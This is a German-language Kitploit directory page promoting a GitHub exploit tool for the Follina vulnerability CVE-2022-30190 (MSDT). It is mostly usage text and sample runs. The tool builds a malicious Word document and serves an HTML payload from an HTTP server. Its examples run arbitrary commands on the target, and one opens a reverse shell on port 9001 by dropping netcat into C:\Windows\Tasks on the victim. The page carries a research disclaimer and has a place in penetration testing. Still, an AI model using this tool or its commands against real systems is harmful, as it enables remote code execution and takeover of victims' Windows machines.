Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
FOLLINA-CVE-2022-30190 — Implementierung von FOLLINA-CVE-2022-30190 | Kitploit
Tools/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

Implementierung von FOLLINA-CVE-2022-30190

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

FOLLINA-CVE-2022-30190

Implementierung von FOLLINA-CVE-2022-30190


Dieses Repository enthält ein Exploit-Tool für die Schwachstelle FOLLINA-CVE-2022-30190

Haftungsausschluss

Dieses Tool wurde für Sicherheitstests und Forschungszwecke entwickelt. Durch das Klonen / Forken dieses Tools übernimmt der ursprüngliche Entwickler keinerlei Verantwortung für die Handlungen der Anwender.


Voraussetzungen

  1. Lies über die CVE-2022-30190 hier
  2. Bereite deine Testumgebung vor (ich empfehle Virtual Box + Vagrant)
  • Lade VirtualBox von hier herunter
  • Lade Vagrant von hier herunter
  • Lies über die Vagrant CLI hier

Erstelle einen "Follina"-MS-MSDT-Angriff mit einem bösartigen Microsoft Word-Dokument und stelle einen Payload mit einem HTTP-Server bereit.

Verwendung

root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

Beispiele

Starte calc.exe:

root@kitploit:~
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

Starte cmd.exe:

root@kitploit:~
$ python3 exploit.py --command "cmd"

Erhalte eine Reverse Shell auf Port 9001. Hinweis: Dies lädt eine Netcat-Binärdatei auf das Opfer herunter und platziert sie in C:\Windows\Tasks. Die Binärdatei wird nicht bereinigt. Dies wird Antivirus-Erkennungen auslösen, sofern das Antivirenprogramm nicht deaktiviert ist.

root@kitploit:~
$ python3 exploit.py --reverse 9001
Tool herunterladen